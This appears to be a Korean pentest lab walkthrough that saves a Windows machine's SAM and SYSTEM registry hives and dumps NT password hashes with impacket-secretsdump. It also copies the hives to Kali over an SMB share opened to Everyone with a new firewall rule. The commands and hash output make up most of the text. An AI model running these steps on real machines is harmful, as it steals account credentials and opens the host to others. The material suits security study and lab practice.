reg save hklm\sam C:\windows\Temp\SAM
reg save hklm\systemC:\windows\Temp\SYSTEM
download SAM
download SYSTEM
SAM 파일과 SYSTEM 파일을 로컬로 옮긴 후에는
impacket의 secretsdump 모듈을 사용하여 NT Hash를 덤핑할 수 있습니다.
impacket-secretsdump -sam sam -system system LOCAL
┌──(root㉿kali)-[~/Pentest/Machine]
└─# impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x662bf0d33d1f0b1865a749d6f5532a9d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a23ed2ef777dcf6a775c4989ebcc7f6d:::
yeonu:1004:aad3b435b51404eeaad3b435b51404ee:d17a76aedb99f92c19fe3db56b226e59:::
[*] Cleaning up...
일반 쉘의 경우 Kali 로컬에서 Windows로 파일을 전송하는 것은 비교적 쉽지만
Windows에서 Kali 로컬로 전송하는 것은 상황에 따라 제한적일 수 있습니다.
이번 실습에서는 Windows에서 SMB 서버를 실행하여 쉐어를 지정하고
해당 쉐어에 원격 접속을 통해 파일을 가져오는 방식을 사용합니다.
mkdir C:\Shared
net share SharedFolder=C:\Shared /grant:Everyone,FULL
net share
net start lanmanserver
netsh advfirewall firewall add rule name="Allow SMB" protocol=TCP dir=in localport=445 action=allow
SMB 서버가실행되었으면 해당 경로에서 SAM과 SYSTEM 파일을 두고
Kali에서 원격 접속을 통해 파일을 가져옵니다.
┌──(root㉿kali)-[~/Pentest/Machine]
└─# smbclient //192.168.133.1/SharedFolder -U Administrator
Password for [WORKGROUP\Administrator]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 7 10:10:48 2024
.. DHS 0 Thu Nov 7 10:06:51 2024
sam A 65536 Mon Nov 4 17:40:41 2024
system A 24739840 Mon Nov 4 17:40:54 2024
248213229 blocks of size 4096. 199583423 blocks available
마지막으로 impacket의 secretsdump 모듈을 통해서 NT Hash를 덤핑해줍니다.
┌──(root㉿kali)-[~/Pentest/Machine]
└─# impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x662bf0d33d1f0b1865a749d6f5532a9d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a23ed2ef777dcf6a775c4989ebcc7f6d:::
yeonu:1004:aad3b435b51404eeaad3b435b51404ee:d17a76aedb99f92c19fe3db56b226e59:::
[*] Cleaning up...